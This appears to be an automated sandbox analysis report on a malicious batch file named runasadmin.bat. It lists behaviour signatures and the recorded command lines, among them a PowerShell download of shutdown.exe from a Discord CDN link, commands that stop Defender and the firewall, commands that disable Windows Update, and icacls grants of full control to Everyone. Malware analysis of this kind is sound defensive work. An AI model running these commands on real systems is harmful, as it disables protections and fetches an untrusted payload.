Analysis Overview
SHA256
61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f
Threat Level: Known bad
The file runasadmin.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Possible privilege escalation attempt
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Modifies file permissions
Launches sc.exe
Delays execution with timeout.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-22 17:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 17:43
Reported
2024-05-22 17:47
Platform
win10v2004-20240426-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Disables service(s)
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
C:\Windows\system32\net.exe
net stop wuauserv
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\system32\net.exe
net stop TrustedInstaller
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cdywult.iq3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |